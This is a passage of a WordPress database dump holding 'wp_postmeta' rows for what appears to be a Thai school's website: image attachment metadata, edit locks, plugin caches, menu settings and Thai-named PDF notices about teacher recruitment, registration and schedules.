(5858, 1962, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1718;s:6:\"height\";i:1205;s:4:\"file\";s:58:\"2018/03/29472837_559055741137285_2187482021297651712_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29472837_559055741137285_2187482021297651712_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29472837_559055741137285_2187482021297651712_o-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29472837_559055741137285_2187482021297651712_o-768x539.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:539;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29472837_559055741137285_2187482021297651712_o-1024x718.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29472837_559055741137285_2187482021297651712_o-400x281.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5859, 1963, '_wp_attached_file', '2018/03/29510989_559055757803950_3873064459421351936_o.jpg'),
(5860, 1963, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1718;s:6:\"height\";i:1205;s:4:\"file\";s:58:\"2018/03/29510989_559055757803950_3873064459421351936_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29510989_559055757803950_3873064459421351936_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29510989_559055757803950_3873064459421351936_o-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29510989_559055757803950_3873064459421351936_o-768x539.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:539;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29510989_559055757803950_3873064459421351936_o-1024x718.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29510989_559055757803950_3873064459421351936_o-400x281.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5861, 1964, '_wp_attached_file', '2018/03/29432516_559055814470611_4603448322693267456_o.jpg'),
(5862, 1964, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1718;s:6:\"height\";i:1205;s:4:\"file\";s:58:\"2018/03/29432516_559055814470611_4603448322693267456_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29432516_559055814470611_4603448322693267456_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29432516_559055814470611_4603448322693267456_o-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29432516_559055814470611_4603448322693267456_o-768x539.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:539;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29432516_559055814470611_4603448322693267456_o-1024x718.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29432516_559055814470611_4603448322693267456_o-400x281.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5863, 1965, '_wp_attached_file', '2018/03/29433243_559055711137288_7067969740471271424_o.jpg'),
(5864, 1965, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1718;s:6:\"height\";i:1205;s:4:\"file\";s:58:\"2018/03/29433243_559055711137288_7067969740471271424_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29433243_559055711137288_7067969740471271424_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29433243_559055711137288_7067969740471271424_o-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29433243_559055711137288_7067969740471271424_o-768x539.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:539;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29433243_559055711137288_7067969740471271424_o-1024x718.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29433243_559055711137288_7067969740471271424_o-400x281.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:281;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5868, 1961, '_hide_featured', NULL),
(5869, 1961, '_wpas_done_all', '1'),
(5870, 1961, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575668069;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3922;}i:1;a:1:{s:2:\"id\";i:4869;}i:2;a:1:{s:2:\"id\";i:5335;}}}}'),
(5871, 1958, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575710003;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4722;}i:1;a:1:{s:2:\"id\";i:5381;}i:2;a:1:{s:2:\"id\";i:4234;}}}}'),
(5896, 1970, '_menu_item_type', 'custom'),
(5897, 1970, '_menu_item_menu_item_parent', '0'),
(5898, 1970, '_menu_item_object_id', '1970'),
(5899, 1970, '_menu_item_object', 'custom'),
(5900, 1970, '_menu_item_target', ''),
(5901, 1970, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(5902, 1970, '_menu_item_xfn', ''),
(5903, 1970, '_menu_item_url', '#'),
(5905, 1971, '_menu_item_type', 'custom'),
(5906, 1971, '_menu_item_menu_item_parent', '0'),
(5907, 1971, '_menu_item_object_id', '1971'),
(5908, 1971, '_menu_item_object', 'custom'),
(5909, 1971, '_menu_item_target', ''),
(5910, 1971, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(5911, 1971, '_menu_item_xfn', ''),
(5912, 1971, '_menu_item_url', '#'),
(5914, 1970, '_publicize_pending', '1'),
(5915, 1971, '_publicize_pending', '1'),
(5919, 1972, '_edit_lock', '1522218955:3'),
(5920, 1972, '_edit_last', '3'),
(5924, 1972, '_hide_featured', NULL),
(5925, 1972, '_wpas_done_all', '1'),
(5926, 1974, '_wp_attached_file', '2018/03/29541022_561916284184564_5755067802129474950_n.jpg'),
(5927, 1974, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/03/29541022_561916284184564_5755067802129474950_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29541022_561916284184564_5755067802129474950_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29541022_561916284184564_5755067802129474950_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29541022_561916284184564_5755067802129474950_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29541022_561916284184564_5755067802129474950_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5928, 1972, '_thumbnail_id', '1974'),
(5931, 1972, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575424859;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5324;}i:1;a:1:{s:2:\"id\";i:5936;}i:2;a:1:{s:2:\"id\";i:4160;}}}}'),
(5932, 1976, '_edit_lock', '1624852063:14'),
(5933, 1976, '_edit_last', '14'),
(5934, 1977, '_wp_attached_file', '2018/03/22-3-2561-16-31-27.jpg'),
(5935, 1977, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:156;s:4:\"file\";s:30:\"2018/03/22-3-2561-16-31-27.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-3-2561-16-31-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"22-3-2561-16-31-27-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-3-2561-16-31-27-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5936, 1978, '_wp_attached_file', '2018/03/22-3-2561-16-33-39.jpg'),
(5937, 1978, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:240;s:4:\"file\";s:30:\"2018/03/22-3-2561-16-33-39.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-3-2561-16-33-39-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5938, 1979, '_wp_attached_file', '2018/03/29-3-2561-13-35-41.jpg'),
(5939, 1979, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:951;s:6:\"height\";i:629;s:4:\"file\";s:30:\"2018/03/29-3-2561-13-35-41.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-35-41-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-35-41-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-35-41-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-35-41-400x265.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5940, 1980, '_wp_attached_file', '2018/03/29-3-2561-13-36-15.jpg'),
(5941, 1980, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:948;s:6:\"height\";i:612;s:4:\"file\";s:30:\"2018/03/29-3-2561-13-36-15.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-36-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-36-15-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-36-15-768x496.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"29-3-2561-13-36-15-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5942, 1976, '_publicize_pending', '1'),
(5943, 1976, '_hide_featured', NULL),
(5947, 1986, '_edit_lock', '1522647600:3'),
(5948, 1986, '_edit_last', '3'),
(5949, 1987, '_wp_attached_file', '2018/04/รับสมัครคัดเลือกครูอัตราจ้าง.pdf'),
(5953, 1986, '_hide_featured', NULL),
(5954, 1986, '_wpas_done_all', '1'),
(5955, 1986, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575594044;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5566;}i:1;a:1:{s:2:\"id\";i:4179;}i:2;a:1:{s:2:\"id\";i:4665;}}}}'),
(5958, 1990, '_wp_attached_file', '2018/04/ประชาพิจารณ์รายละเอียดร่างคุณลักษณะครุภัณฑ์-1-รายการ.pdf'),
(5979, 1997, '_edit_lock', '1522909828:3'),
(5980, 1997, '_edit_last', '3'),
(5981, 1998, '_wp_attached_file', '2018/04/ประชาพิจารณ์รายละเอียดร่างคุณลักษณะ-1-รายการ-5เมย.61.pdf'),
(5985, 1997, '_hide_featured', NULL),
(5986, 1997, '_wpas_done_all', '1'),
(5987, 1997, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575195571;s:7:\"payload\";a:0:{}}}'),
(5988, 2000, '_edit_lock', '1522910188:3'),
(5989, 2000, '_edit_last', '3'),
(5990, 2001, '_wp_attached_file', '2018/04/29745047_565524713823721_5828249132375060180_o.jpg'),
(5991, 2001, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2018/04/29745047_565524713823721_5828249132375060180_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29745047_565524713823721_5828249132375060180_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29745047_565524713823721_5828249132375060180_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29745047_565524713823721_5828249132375060180_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29745047_565524713823721_5828249132375060180_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29745047_565524713823721_5828249132375060180_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5992, 2000, '_thumbnail_id', '2001'),
(5996, 2000, '_hide_featured', NULL),
(5997, 2000, '_wpas_done_all', '1'),
(6000, 2000, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575588818;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6320;}i:1;a:1:{s:2:\"id\";i:6054;}i:2;a:1:{s:2:\"id\";i:3961;}}}}'),
(6001, 2005, '_wp_attached_file', '2018/04/ปต.pdf'),
(6002, 2006, '_wp_attached_file', '2018/04/central-lab.pdf'),
(6003, 2011, '_edit_lock', '1524625516:3'),
(6004, 2011, '_edit_last', '3'),
(6005, 2012, '_wp_attached_file', '2018/04/กำหนดการปฐมนิเทศ.pdf'),
(6009, 2011, '_hide_featured', NULL),
(6010, 2011, '_wpas_done_all', '1'),
(6011, 2011, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1571763038;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3975;}i:1;a:1:{s:2:\"id\";i:4934;}i:2;a:1:{s:2:\"id\";i:3961;}}}}'),
(6014, 2015, '_edit_lock', '1524643641:3'),
(6015, 2015, '_edit_last', '3'),
(6016, 2016, '_wp_attached_file', '2018/04/รับสมัคร-จนท-วิทยบริการ.pdf'),
(6020, 2015, '_hide_featured', NULL),
(6021, 2015, '_wpas_done_all', '1'),
(6022, 2015, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575687343;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5926;}i:1;a:1:{s:2:\"id\";i:5197;}i:2;a:1:{s:2:\"id\";i:5094;}}}}'),
(6023, 2018, '_edit_lock', '1524643978:3'),
(6024, 2018, '_edit_last', '3'),
(6025, 2019, '_wp_attached_file', '2018/04/รับสมัคร-ครูอัตราจ้าง-ก่อสร้าง.pdf'),
(6029, 2018, '_hide_featured', NULL),
(6030, 2018, '_wpas_done_all', '1'),
(6031, 2018, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575371326;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:4269;}}}}'),
(6032, 2021, '_edit_lock', '1524712662:3'),
(6033, 2021, '_edit_last', '3'),
(6034, 2022, '_wp_attached_file', '2018/04/31265634_574604726249053_6815150661005475840_o.jpg'),
(6035, 2022, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/04/31265634_574604726249053_6815150661005475840_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31265634_574604726249053_6815150661005475840_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31265634_574604726249053_6815150661005475840_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31265634_574604726249053_6815150661005475840_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31265634_574604726249053_6815150661005475840_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31265634_574604726249053_6815150661005475840_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6036, 2021, '_thumbnail_id', '2022'),
(6040, 2021, '_hide_featured', NULL),
(6041, 2021, '_wpas_done_all', '1');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(6042, 2021, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1573757661;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:5962;}i:2;a:1:{s:2:\"id\";i:5026;}}}}'),
(6043, 2026, '_edit_lock', '1524731887:3'),
(6044, 2026, '_edit_last', '3'),
(6046, 2028, '_wp_attached_file', '2018/04/การลงทะเบียนเรียนประจำภาคเรียนที่-1-ปีการศึกษา-2561.pdf'),
(6050, 2026, '_hide_featured', NULL),
(6051, 2026, '_wpas_done_all', '1'),
(6052, 2026, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574756503;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:5172;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(6053, 2030, '_edit_lock', '1524800717:3'),
(6054, 2030, '_edit_last', '3'),
(6055, 2031, '_wp_attached_file', '2018/04/ประกาศรายชื่อผู้มีสิทธิ์สอบคัดเลือก-ครูอัตราจ้าง.pdf'),
(6059, 2030, '_hide_featured', NULL),
(6060, 2030, '_wpas_done_all', '1'),
(6061, 2030, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1567052923;s:7:\"payload\";a:0:{}}}'),
(6062, 2034, '_wp_attached_file', '2018/04/หนังสือแนะนำการเบิกประกันอุบัติเหตุ.pdf'),
(6064, 2038, '_edit_lock', '1525076120:3'),
(6065, 2038, '_edit_last', '3'),
(6066, 2039, '_wp_attached_file', '2018/04/ตารางเวร-เดือน-พฤษภาคม-2561.pdf'),
(6070, 2038, '_hide_featured', NULL),
(6071, 2038, '_wpas_done_all', '1'),
(6072, 2038, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575152778;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(6084, 2046, '_edit_lock', '1580532663:14'),
(6085, 2046, '_edit_last', '14'),
(6086, 2047, '_tablepress_table_options', '{\"last_editor\":1,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(6087, 2047, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(6088, 2048, '_edit_lock', '1525228529:3'),
(6089, 2048, '_edit_last', '3'),
(6090, 2049, '_wp_attached_file', '2018/05/ประกาศ-พ้นสภาพผลการเรียนไม่ถึงเกณฑ์-ภาคเรียนที่-2-2560.pdf'),
(6094, 2048, '_hide_featured', NULL),
(6095, 2048, '_wpas_done_all', '1'),
(6096, 2048, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1572086079;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5469;}i:1;a:1:{s:2:\"id\";i:5172;}i:2;a:1:{s:2:\"id\";i:4718;}}}}'),
(6097, 2052, '_wp_attached_file', '2018/05/Nuttharee-Academic-Works.pdf'),
(6098, 2046, '_hide_featured', NULL),
